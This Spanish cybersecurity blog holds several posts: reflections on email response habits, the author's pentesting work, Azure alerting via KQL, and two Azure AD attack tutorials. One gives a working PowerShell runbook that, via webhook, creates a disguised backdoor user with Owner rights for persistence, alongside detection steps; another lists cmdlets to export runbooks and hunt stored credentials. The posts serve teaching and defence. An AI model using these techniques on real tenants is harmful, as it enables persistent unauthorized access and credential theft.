viernes, 30 de septiembre de 2022

Cual es tu frecuencia de gestión/respuesta a correos?

 Estimados amigos de Inseguros!!!

Hoy voy a reflexionar y pedir vuestra opinión sobre el tema del correo en el mundo empresarial, las comunicaciones, la velocidad de respuesta y todo esto.

Los que me conocéis y trabajáis conmigo, creo que coincidís con lo que opino de mi, que suelo ser ágil con los correos. Esto lo aprendí en mi primer trabajo. NUNCA seguí la línea de correo que entra, correo que gestione, y así en "hilera".

Pronto aprendí a que un correo de mi jefe era más importante que otro. O que si era del DUEÑO, era aún más. Y si el mensaje era de la mujer del dueño o su hermano, eso pasaba a ser de vida o muerte, ya que estaba en juego mi trabajo, y el del dueño ante su familiar xD

Muchas veces tenemos correos que requieren de 1 hora de trabajo, otros requieren de 2 minutos. Otros requieren de paciencia. Otros no hacemos nada con ellos. Algunos se van quedando atrás hasta que una vez al año los borramos.

Cuando hablo de correos, suelo asociarlo a "tareas". Para mi un correo marcado sin leer es "algo" que tengo que hacer. Si leo un correo y no lo puedo atender, lo vuelvo a dejar sin leer, para que mi frágil mente tenga pendiente que tengo que hacer algo.

Cada uno nos organizamos como podemos. 

El propósito de este post, es exponer algunos comportamientos de colegas/clientes/amigos que son tan radicalmente opuestos a los míos, que me rechinan.

Por ejemplo, estás inmerso en una tarea con alguien importante. Le mandas un mail al tipo a las 18:05 y como sale a las 18:00, ese correo muere hasta el día siguiente...

Yo no soy quien para decirle a la gente cómo usar su tiempo libre, pero yo cuando termino de trabajar sigo usando el móvil. A veces estoy en el gimnasio en la bici a las 19:32 y si me entra un correo de alguien, y puedo "quitarme" esa tarea, le respondo. Por supuesto que si requiere de trabajo o esfuerzo no pueda, y NO ESTOY DICIENDO que tengas que hacer esto, pero yo si puedo desastacar algo, que me cuesta 1 minuto, y quizás a mi contacto le de "alas" para seguir...lo hago. Hay gente con la que NO, y no es factible, pero NUNCA?

Tengo compañeros que responde correos a las 6 de la mañana en un avión, a las 21:45 viendo las noticias, en el postre en la comida... NO te digo que seas así, cada uno modula la intensidad y dedicación de su vida laboral, pero esto debería aportar algo por ejemplo a la hora de las remuneraciones? es lo mismo alguien que corta a las 18:00 en punto, a uno que, no trabaja 24 horas, pero si que revisa al menos el asunto del correo de vez en cuando?

Luego hay otros que se les olvida, con estos lo flipo. Gente que ve el correo, está ocupado, le entran 4 cosas más y ya tu correo muere. De verdad? es como cuando alguien te dice que "no le llegó el correo" amigo... en los 2000 si, pero en 2022 POCOS correos se pierden, eres un desastre !!!

Seguimos con el ordenado. Lee el asunto !!! Imagina un cocinero que va haciendo receta por receta, plato por plato conforme le entran. No comeríamos en 10 vídas !!! El cocinero está haciendo un plato. Escucha que llega una comando de un ... yo que se... cerdo asado... si sabe que el cerdo tarda 20 minutos en descongelarse, mientras que está haciendo una lubina, para 10 segundos para sacar el cerdo del congelador, para que cuando le toque al turno del plato, ya esté descongelado. Es sencillo...MULTITAREA.

Hay compañeros/clientes/amigos que NO. No lo hacen. Son como un robot. No le pidas hacer una cosa, cuando están haciendo otra. Aunque eso implique dejar parado a un equipo. A estos no los soporto.

Con el Covid, la digitalización y los "slots libres" han crecido este número. No le pidas nada, pídele una cita para verlo... necesitas 5 minutos de él o ella, pero te emplaza para dentro de 14 días...

Tengo algún cliente, que le pides una cosa: dame de alta un usuario. Y tarda 10 días, REAL. A ver, imagino que el hombre estará súper liado, pero como decíamos del cocinero. Dame el usuario en 5 minutos y no me tengas parado a mi...Se llama falta de consideración?

Otra cosa que me llama la atención, es que si la gente está acostumbrada a que respondas rápido, si un día lo haces lento se quejan. Sin embargo, aceptamos a esa persona que sabemos que va a tardar...no?

QUE SIIIII, que estoy tocando temas delicados, como la jornada laboral, el derecho al descanso, desconexión, etc, pero lo estoy viendo desde el punto de vista de la eficacia. 

NO digo que trabajes en vacaciones, ni los sábados, ni que vivas pendiente como yo del móvil, pero hay escenarios en los que este NO, se podría "modular".

Quizás este enganchado al trabajo? seguro, pero por otro lado, los que me conocéis, saco tiempo para el trabajo, para mis proyectos personales, para formarme, para contaros cosas, y me da tiempo para llevar una vida rica de actividades. Que no trabajo de 8 de la mañana a 10 de la noche, ya te digo yo que no, pero lo que es cierto son dos cosas, que siempre estoy pendiente, y que cuando trabajo, rindo como un cabrón.

No entiendo eso de estar trabajando " a medio gas". Si estoy estoy. Que son las 13:30 del viernes, seguramente estaré lejos de un pc, pero si estoy, estoy para lo que venga, como el héroe de juego manga...

Acabando ya el consultorio hater de kinomakino xD, qué tipo de trabajador eres tú?

Gracias por leerme.


lunes, 26 de septiembre de 2022

A qué me dedico profesionamente...

 Estimados amigos de Inseguros !!!

Algunos me consta que me seguís en cada aventura, y otros muchos llegáis en google buscando cosas como "hackers guapos de Murcia" y cosas así :-)

El otro día hablando con mi amigo el JaBato, hablando de nuestro día a día no parecía saber muy bien a lo que me dedicaba. Y esto no es todo lo bueno que cabe esperar para mi, ya que yo vendo mis servicios de ciberseguridad a empresas, por eso, he decidido contaros un poco más en detalle qué suelo hacer en mi día a día, o qué proyectos suelo acometer, para que lo tengas en el radar, para que me conozcas más, y como siempre, para que me tengas a tu disposición.

Principalmente mi trabajo está relacionado con la auditoría, consultoría y formación. Actualmente trabajo para la empresa Verne Tech.

Hago auditorías de seguridad, pentesting, hacking ético, red team... Como quieras llamar a las acciones ofensivas. Estoy muy orgulloso de mis resultados, ya que tengo conocimientos transversales, desde hacking web, a lo que más o menos sabes, que es el hacking Windows, Microsoft...Azure y estas cosas.

Lo bueno de mis auditorías es que suelo encontrar muchos fallos, entrar hasta la cocina,etc pero siempre he cuidado muchos las acciones de mejora. Las medidas recomendadas para solventar deficiencias. 

Soy un fiel defensor de que para saber atacar hay que saber defender, y no me vale que me "saques" 4 fallos, y que no me des una solución. O que me des una solución basada en un fabricante concreto, o una solución que no esté alineada con la empresa, o con el presupuesto económico... No todas las empresas pueden tirar lso W2008 a la basura... ni despedir empleados con pocos conocimientos técnicos.

Mis 30 años de experiencia en la informática creo que me posicionan bien en este sentido.


Si empezamos con auditoría, seguimos con la consultoría. No soy amigo de coger tu Active Directory y fortificarlo a base de GPO´s, y que el sysadmin no sepa qué hemos hechos. Soy amigo de acompañaro, de decirle qué y cómo tiene que hacerlo, de hacerlo junto a él, de darle soporte, pero creo que hay partes de los sistemas que la mejor persona o personas para acometer los cambios deben de ser desde dentro.

Y siguienteo esta línea, de consultoría, está la formación. No solo contarte los clicks que tienes que hacer, sino mostrarte lo que hay detrás, el por qué de las cosas. Cómo están los malos rompiendo algo. Cómo debemos los buenos de arreglar algo. 

Las formaciones son muy enriquecedoras para los clientes y disfrutamos mucho.

Como te he dicho, mi área de conocimiento es transversal, pero si que es cierto que me manejo con Microsoft, Windows, Azure, O365, Azure Sentinel, Defender y por supuesto linux, mucho linux.

Como mi perfil es transversal, muchas veces hay que hacer misión comercia, ayudar a los compañeros con la redacción de algunos items de una preventa... esta parte también la manejo y me gusta.

Y por último, ayudar en lo que puedo. Si aparece un caso de DFIR complejo, con mucha presencia "Microsoft" pues suelo echar un cable. O en el SOC, si hay que trabajar algunos TTp´s tanto en defensa como en detección.

Al final como sabes, me defino como un apasionado de la ciberseguridad. Podría instalar un Vmware y una 3700, pero prefiero centrarme en lo otro que no es poco.

Espero que te haya servido un poco para saber qué hago, cómo te puedo ayudar, y si te sirve para orientarte un poco en este mundillo de la ciber.

Como siempre, gracias por leerme !!!

lunes, 19 de septiembre de 2022

Tips&Tricks AzureAd: Crear una alerta sin meten a un usuario a un grupo admin... sin usar SIEM

 Estimados amigos de Inseguros!!!

Los que leeís el blog estaís acostumbrados a leer SIEM. Empezamos hace muchos años con AlienVault, ahora más con Microsoft Sentinel, pero no es algo nuevo.

Lo que no es nuevo es que estos sistemas son costosos, y que no todas las empresas han empezado con dicha andadura. O bien por costes, o por personal que les gestione las alertas, pero no lo encuentro en gran parte de mis clientes.

En el post de hoy vamos a mejorar la monitorización de eventos en nuestro Azure AD con herramientas "del sistema" para hacerlo más fácil y económico.

Pongamos por ejemplo que en un ataque, un maloso añade un usuario a un grupo administrador... deberíamos ser capaces de tener un correito con dicha alerta no?

Vamos a crear un Log Analytics Space, lo que sería un repositorio de almacenamiento donde irán los logs.

Los que usais Sentinel sabéis que logs se guardan en un spacio así, y se monta Sentinel por "encima" como softwara de ciberseguridad. Pero en esos Log Analytics podemos guardar casi cualquier cosa...

Es importante contar con que estos registros tiene un coste. Ponle 2 euros por gb... pero para este caso, una alerta de este tipo, nos va a consumir "céntimos". Podemos ver los precios aquí.


Entramos en Azure AAD, en Supervisión, Configuración de Diagnóstico... donde sino xD


Ahora agregamos una configuración, y activamos que eventos queremos guardar, y donde enviarlos. 

En esta ocasión voy a ser generoso y voy a activar que guarde todos los logs relacionado con "login".


Ahora que tenemos los eventos, vamos a Azure Monitor y creamos una regla de alerta.


Ahora delimitamos, que para la suscripción que queremos, para el grupo de recursos que queremos, el log analytics que hemos creado.


En condición, le decimos que queremos una condición Búsqueda de registros personaliza... y aquí haremos la magía del KQL xD xD xD


Le decimos por ejemplo algo así: 

AuditLogs | where OperationName contains "Add member to role" 

Y en los umbrales, le decimos que mayo que 0 cada 5 minutos.

Por último añadimos una acción, como vimos en el artículo anterior, y hacemos una prueba.


Espero que os sirva de ayuda este pequeño gran consejo.

Gracias por leerme !!!



viernes, 16 de septiembre de 2022

Mecanismos de persistencia en Azure AD mediante Runbooks, automatización y webhooks. y Detección !!!

 Estimados amigos de Inseguros !!!

En el post de hoy vamos a hablar de una de las fases que menos interesan a los blue team de primeras, a los red team así así, pero a los de respuesta a incidentes les trae de cabeza. Hablo sin duda de la persistencia.

En algún curso lo he preguntado los primeros días y confunden persistencia con tenacidad xD intentarlo muchas veces... no. Nos referimos a garantizar el acceso después de comprometer un equipo.

Por ejemplo, si pillas las claves de administrador, crear un usuario con esos permisos por si cambian las claves del usuario administrador, no quedarte sin nada...


El "rojo" quiere entrar como sea... el azúl que no le entren, pero cuando estás jodido, hay que ver por donde, y esto es muy dificil de detectar en un entorno Cloud en donde los logs no están tan a la vista, y todo es más "software" aún si cabe...

Vamos a trabajar con los Runbooks, los servicios de automatización de Azure. Si leiste el artículo de cómo identificarlos seguro que te suena algo más.

La idea es que después de comprometer un equipo, creemos una automatización que contenga un script, que cree un usuario con permisos. Crearemos una invocación. 

Si después de nuestro ataque revocan accesos que teníamos, realizaremos la invocación de un webhook que activará el script que creará un usuario y password. El concepto es sencillo.

Vamos a crear lo primero la cuenta de automatización.


Asignamos a la identidad de la cuenta que hemos creado para la cuenta de automatización los permisos de administrador de usuarios y de permisos.


Ahora nos vamos a la suscripción que queramos, al grupo de recursos, y añadimos el rol de Owner a la cuenta de automatización que hemos creado...


Se masca la tragedia? xDDDDD

Ahora volvemos a la cuenta de automatización y nos vamos a Módulos.


Y en examinar galeria, importamos az.accounts y az.resources


Una vez que tenemos "a nuestro alcance" los módulos, vamos a la cuenta de automatización, runbooks y le decimos importar. Ahora subiremos nuestro script de la muerte con la persistencia que queremos !!!

El script que ha funcionado es este:

Import-Module Az.Accounts
Import-Module Az.Resources
$user = "maloso@****.onmicrosoft.com"
$pass = "***”
$Nickname = "BackupsVc"
$DisplayName = "backup_service"
Connect-AzAccount -CertificateThumbprint "CBD27*****31AAA1" -TenantId "57****abf6-3f963d9d976e" -ApplicationId "f8916*****f6fda9" -ServicePrincipal
$SecureStringPassword = ConvertTo-SecureString -String $pass -AsPlainText -Force
New-AzADUser -DisplayName $DisplayName -UserPrincipalName $user -Password $SecureStringPassword -MailNickname $Nickname
New-AzRoleAssignment -SignInName $user -RoleDefinitionName "Owner"

Te aconsejo que primero vayas probando desde ahí mismo para ver los errores, en una consola o desde la creación del runbook.

Cuando importamos, fijaros en los nombres de los runbooks previos, veis que tenemos alguno de tutorial, lo suyo es usar una nomenclatura como esa.


Ahora añadimos lo que será nuestra puerta de entrada, el webhook que llamará al automatismo para recuperar nuestra persistencia.


Una vez tenemos la llamada, procedemos a invocarlos y bingo, se nos crea el usuario...


Para rellenar el script con vuestros datos, creo que lo tenéis todo aquí:


La idea de usar las cuentas de automatismos no es ni nueva ni mía. Hace dos o tres años que se viene apareciendo este TTP y ya se ha hablado de ella en varios blogs, pero me gusta aportar mi granito de arena, y sobre todo, que a día de hoy, los scripts de las webs existentes no funcionan. Ya sabéis que actualizan las versiones de los módulos de Powershell, y algunos Cmdlets cambian.

Al final, es importante conocer estas técnicas tanto si atacas, como si defiendes, y que consolides y aprendas de los todo el mundo Azure. Como decía un haters, que es como el ordenador de otro...si si...

Lo que es más importante es ser capaces de detectar estos movimientos. Por ejemplo, en este ejercicio hemos creado automatismos, usuarios, hemos metido usuarios a grupos... todo esto te lo debería cantar un SIEM. Pero quien tiene un SIEM hoy en día? xD xD xD

Vamos a ver un sistema de detección más sencillo. Vamos a empezar al revés, por crear los eventos. Es decir, si sigues este artículo, tendrás estos eventos.

Ahora nos vamos a una suscripción, donde hemos creado la cuenta de automatización y vemos los registros de actividad.


Con el evento que más nos gsute, le damos a Nueva Regla de Alertas. Por ejemplo en creación de Automation job.


Aquí deberías cambiar Evento iniciado por, y dejar TODOS...

Seguimos con más detalles... 


A continuación seleccionamos Acciones, crear. Y vamos a crear notificaciones a kino xD


Con esto y poco más, tendremos una alerta cuando se produzca un evento de este tipo...



Existen otras vías para configurar estas acciones, en otro post los veremos.

Espero que os guste, gracias por leerme !!!

jueves, 15 de septiembre de 2022

Tips&Tricks AzureAd: Cazando contraseñas en Runbooks

Estimados amigos de Inseguros!!!

Los que vais conociendo un poco más del mundo Azure y en general del Cloud, entendeis que la cadena de ataques que hacen los malos difiere bastante de la que siguen los ataques destinados al mundo OnPrem.

Por ejemplo, no tiene mucho sentido buscar servidores desactualizados en servicios SaaS... por lo que la identidad suele se la pieza clave.

Una vez que tenemos una identidad, tenemos que enumerar el entorno, conocer la organización que queremos atacar/proteger.

Dentro de esta enumeración, vamos a ver un pequeño proceso que en alguna ocasión ha servidor para escalar privilegios. Se trata de los Runbooks. Son funciones de código en python o powershell que programas en la nube, sin necesidad de montar un servidor por debajo para moverlas...muy útil para cualquier proceso que uses ahora, sin tener que meter la pata de administración del sistema operativo.

En muchas ocasiones estos automatismos introducimos claves en los scripts, en vez de usar Key Vaul o similar, ya sabes para ir a nosedonde,coger noseque y hacer nosecuantos. 

Un buen hacker/auditor miraría en estos runbooks para ver si hay contraseñas.

En otro post vamos a usarlas como persistencia, pero esto es solo para poneros los dientes largos xD

Una vez tenemos acceso a un Tenant, buscamos cuentas de automatismos.

Get-AzAutomationAccount

Una vez que tenemos una cuenta, buscamos todos los runbooks que mueve esa cuenta.

Get-AzAutomationRunbook -AutomationAccountName «AutomationAccountName> -ResourceGroupName <ResourceGroupName> 


Una vez hemos encontrado el automatismo, procedemos a descargarlo en nuestro sistema para olfatear :-)

Export-AzAutomationRunbook -AutomationAccountName<accountname> -ResourceGroupName <resource group name> -Name runbook name> 

Si tenemos suerte, podremos ver algún token/clave/secreto o cualquier otra información que nos sirva para hacernos con el control del mundo xD xD xD

Espero que os sirva de ayuda, y lo probeis en vuetros clientes para comprobar que no existen riesgos.

Gracias por leerme !!!